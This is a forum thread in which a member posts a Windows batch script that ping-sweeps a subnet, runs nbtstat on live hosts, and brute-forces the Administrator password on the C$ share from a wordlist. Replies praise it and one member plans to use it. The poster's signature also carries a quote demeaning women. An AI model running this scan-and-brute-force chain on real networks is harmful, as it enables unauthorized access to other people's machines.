Page 1 of 2 12 LastLast
Results 1 to 10 of 17

Thread: Hacking with DOS?

  1. #1
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,785

    Hacking with DOS?

    Many are quick to say windows is lame. well it might not be as stable and might not come with all the third party software *nix has but an operating system is only as lame as its operator.now i can think of a dozen boring examples but nobody would pay any attention so i made a up a simple scenerio that might get some to really try to learn their OS.


    (lame though it may be it's just to illiustrates a point)

    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

    What i dont have a scanner on this computer im on and can't download EXEs...no prob! this is an NT based box and i know my ****:

    sending.bat
    ------------------------------------------

    REM all the text for each "for" statement
    REM must be on one line

    for /L %%x IN (1,1,255) DO ping -n 1 10.0.0.%%x | find /I "reply" >>pg.txt

    for /F "tokens=1 delims=:" %%x in (pg.txt) DO echo %%x >>pg2.txt

    for /f "tokens=3" %%x IN (pg2.txt) DO nbtstat -A %%x |more >>pg3.txt

    -------------------------------------------
    You could enter it one line at a time at the command prompt without makeing a batchfile, but thats not nearly as much fun

    in the first "for" statement, (1,1,255) says: make %%x egual 1 incremanting by 1 each loop until it reaches 255. In a batch file '%' by itself will be removed so it must be used twice: "%%"

    ping returns:

    Reply from 10.0.0.1: bytes=32 time=150ms TTL=59

    by changing the default delimiter to a colon, splitting the line into 2 tokens in pg2.txt and printing only the first and removing the colon because it is the delimiter ( tokens=1 delims= leaving only:

    Reply from 10.0.0.1

    in the third "for" statement we used the default or "space" delimiter making the IP addy the

    third token (token=3) and using nbtstat -A we record the results to pg3.txt

    now its time for to get yourself a drink and go to the bathroom before you get into the long haul:

    for /f "tokens=1" %%x in (wordlist.txt) do NET USE \\10.0.0.1\c$ /user: Administrator %%x

    This is all done with out using some stupid poorly made program that may contain a trojan.

    your on your own from here, im not trying to teach you to break into a computer there's enough written in tutorials to show you that, but rather show you what you can do if you know you OS. just remember if you try this on the net you could get screwed. There is nothing stealth about this.

    Have a happy new year and resolve to really learn what you have. Dont wait for that special book or turtorial to come along....just do it
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  2. #2
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,785

    I guess this needs to be pointed out more clearly.

    This will not work on 9x machines

    For those who do not know their basics, "for" is an internal command. that is to say it is contained in commnad.com and cmd.exe.

    the for command on 9x machines will not loop threw the contents of files or incremant variables. only the for command of NT or better machines will do this.
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  3. #3
    Senior Member
    Join Date
    Aug 2002
    Posts
    651
    You bring up a very good point here Ted. I mean, why not learn the OS if you are going to be working with it? As for the "hack", I personally don't have much experience with batch files or programming for that matter, but I do understand the implications. For the most part, I can look at files like this and figure out what they mean, so your post has proven quite helpful (That's the point, I know.) I have not had much choice in learning Windows, but I am trying to learn as much as I can of Linux. My efforts have proven invaluable since I have been assigned projects involving the OS at work.

    Next time make up your mind where you want to post it; you moved it on me earlier, and I had to retype it from memory! j/k Keep up the good work Ted.


    Cheers.
    Opinions are like holes - everybody\'s got\'em.

    Smile

  4. #4
    Junior Member
    Join Date
    Jun 2003
    Posts
    26
    hmmm nice one a netbios batch file scanning
    gonna use this one for sure

    but it scans only for administrator account or am i wrong?

  5. #5
    Deceased x acidreign x's Avatar
    Join Date
    Jul 2002
    Posts
    455
    you said this would work on "NT or better" but I tried it on BSD and it didn't work :-(
    (joking)

    Good tutorial, I enjoyed reading it.
    :q :q! :wq :w :w! :wq! :quit :quit! :help help helpquit quit quithelp :quitplease :quitnow :leave :**** ^X^C ^C ^D ^Z ^Q QUITDAMMIT ^[:wq GCS,M);d@;p;c++;l++;u ++ ;e+ ;m++(---) ;s+/+ ;n- ;h* ;f+(--) ;!g ;w+(-) ;t- ;r+(-) ;y+(**)

  6. #6
    Senior Member
    Join Date
    Jun 2003
    Posts
    119
    Ok someone needs to PM me im confused..srry
    [glowpurple]The inside secrets of big buisness are being leaked onto the Net - (who\'s fault is that ) - Me[/glowpurple] http://www.AntiOnline.com/sig.php?imageid=419

  7. #7
    Fantastic Post...The only problem posed is that like someone before me said, it only scans from the "admin". So one might be confronted with not only finding the pass but a valid user name as well.

    Scat
    If the scatman can do it so can you.

  8. #8
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,785
    i just used that as an example of what you could do as food for thought. you could use the same principle to scan for null connections or whatever just put the commands with args after the DO, but as was stated eariler you could get busted.

    on the non-hacking side, i have a bunch of remote locations with winVNC listening on DSL connections. each location sends a file with its location code as its name to an ftp server. Using the FOR command i loop threw the log twice. the first pass gets piped threw 'find' and creates a file containg only lines with the matchng location code. the second time i loop threw making %%X equal the IP Address. the next line starts VNC %%X which is the last or latest address in the log file. now all i have to do is enter the password.
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  9. #9
    Junior Member
    Join Date
    Mar 2005
    Posts
    1
    very smart to point out that you must know your OS if you want to hack anything, even simple batch files with DOS.

  10. #10
    Senior Member
    Join Date
    Jan 2005
    Posts
    217

    WELCOME TO AO

    Hi dickfitzwell,

    WELCOME TO AO!

    I believed that hacking interests you, as well as it interest us here in AO, especially on being aware of it, and avoiding such things in the near future.

    You could visit the AO FAQ for more introduction about AO.

    For start-up, same like any organization that you are willing to join, AO has rules, traditions, and a community willing to help and share their knowledge and opinions. The FAQ could be a short walk-through for you to get involved in the community.

    Enjoy your stay!

    Yo!
    \"Life without FREEDOM is no life at all\". - William Wallace
    MyhomE MyboX StealtH (loop n. see loop.)
    http://www.geocities.com/sebeneleben/SOTBMulti.gif

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •